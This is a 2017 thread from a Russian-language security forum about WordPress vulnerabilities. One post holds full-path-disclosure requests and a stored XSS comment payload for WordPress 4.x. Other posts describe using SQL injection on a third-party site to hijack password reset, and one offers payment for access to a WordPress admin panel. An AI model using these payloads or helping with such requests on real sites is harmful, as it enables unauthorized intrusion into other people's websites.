HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #361  
Старый 05.01.2017, 11:08
abrakadabra
Guest
Сообщений: n/a
Провел на форуме:
799

Репутация: 0
По умолчанию

Цитата:
Сообщение от grimnir  
Там ошибки вылетают, с функцией print ни на версии 27 и 35 питоне не запускаеться.
 
Ответить с цитированием

  #362  
Старый 18.01.2017, 14:21
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

WordPress 4.6.2 через соседние самописные скрипты имею sql-injection (только просмотр БД)

Пароли на расшифровке на неизвестное время

Можно ли как то задействовать функцию восстановления пароля?

Как привести в нормальный вид хеш содержащиеся в wp_users -> user_activation_key Вида (1484638848:$P$BT9pkNHDgo7gLHb1VaK1MoqYppOuC0) (пару символов неверны), что бы в URL'e указать
 
Ответить с цитированием

  #363  
Старый 18.01.2017, 23:52
Ravenous
Guest
Сообщений: n/a
Провел на форуме:
44130

Репутация: 26
По умолчанию

Цитата:
Сообщение от kacergei  
kacergei said:

WordPress 4.6.2 через соседние самописные скрипты имею sql-injection (только просмотр БД)
Пароли на расшифровке на неизвестное время
Можно ли как то задействовать функцию восстановления пароля?
Как привести в нормальный вид хеш содержащиеся в wp_users -> user_activation_key Вида (1484638848:$P$BT9pkNHDgo7gLHb1VaK1MoqYppOuC0) (пару символов неверны), что бы в URL'e указать
никак. user-activation-key зашифрован так же, как пароль. Он хранился в чистом виде только в древних версиях
 
Ответить с цитированием

  #364  
Старый 27.01.2017, 23:03
amik
Guest
Сообщений: n/a
Провел на форуме:
205

Репутация: 0
По умолчанию

кто нибудь слышал об sql injection от версии 4.7 и ниже.

как я понял уязвимость находиться wp_query
 
Ответить с цитированием

  #365  
Старый 28.01.2017, 00:08
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от amik  
amik said:

кто нибудь слышал об sql injection от версии 4.7 и ниже.
как я понял уязвимость находиться wp_query
Баг из разряда гипотетических:

WP_Query is vulnerable to a SQL injection (SQLi) when passing unsafe data. WordPress core is not directly vulnerable to this issue, but we’ve added hardening to prevent plugins and themes from accidentally causing a vulnerability.

https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
 
Ответить с цитированием

  #366  
Старый 08.02.2017, 12:09
st55
Guest
Сообщений: n/a
Провел на форуме:
52834

Репутация: 47
По умолчанию

Wordpress 4.*.*

Full Path Disclosure


wordpress/wp-login.php

Код:
Code:
POST: log[]=1&pwd[]=1&redirect_to[]=
wp-json

Код:
Code:
GET: wordpress/wp-json/oembed/1.0/embed?format=xml&url[]=123
Код:
Code:
Cookie: comment_author_email_dbdee7661db32144cd2347d98b860504[]
Wordpress 4.7.2

Stored XSS


Привилегии: Редактор+

/wp/wp-comments-post.php

Код:
Code:
POST: comment=">alert('XSS');
 
Ответить с цитированием

  #367  
Старый 12.03.2017, 00:12
mazaxaka
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
Провел на форуме:
883446

Репутация: 82
По умолчанию

Цитата:
Сообщение от st55  
st55 said:

Wordpress 4.*.*

Full Path Disclosure

wordpress/wp-login.php
Код:
Code:
POST: log[]=1&pwd[]=1&redirect_to[]=
wp-json
Код:
Code:
GET: wordpress/wp-json/oembed/1.0/embed?format=xml&url[]=123
Код:
Code:
Cookie: comment_author_email_dbdee7661db32144cd2347d98b860504[]
Wordpress 4.7.2

Stored XSS

Привилегии: Редактор+
/wp/wp-comments-post.php
Код:
Code:
POST: comment=">alert('XSS');

раскрытие путей работает только через wp-login.php и то редко, wp-json вообще не работает, можно подробней?
 
Ответить с цитированием

  #368  
Старый 12.03.2017, 19:05
loverast
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Кто нибудь заюзал эту багу https://xakep.ru/2017/03/01/nextgen-...sql-injection/ ?
 
Ответить с цитированием

  #369  
Старый 21.03.2017, 12:19
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию

Народ, нужна ваша помощь:

1 у кого-то когда-то срабатывали эксплоиты на ВП из метасплоита???

2 - https://github.com/WordPress/WordPre...c56d24267054cb

как применить его на практике?
 
Ответить с цитированием

  #370  
Старый 29.03.2017, 21:52
ArturKonDoil
Guest
Сообщений: n/a
Провел на форуме:
250

Репутация: 0
По умолчанию

Всем доброго времени суток. Нужна помощь в получении доступа к админке WordPress 4.7.3, естественно не бесплатно. Можно в личку.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Веб-уязвимости 361 24.10.2019 10:25
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Веб-уязвимости 43 04.02.2012 20:33
[ Обзор уязвимостей SLAED CMS ] _kREveDKo_ Веб-уязвимости 20 01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ nike57 Уязвимости Mail-сервис 4 05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов markel Уязвимости Mail-сервис 3 12.09.2005 10:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ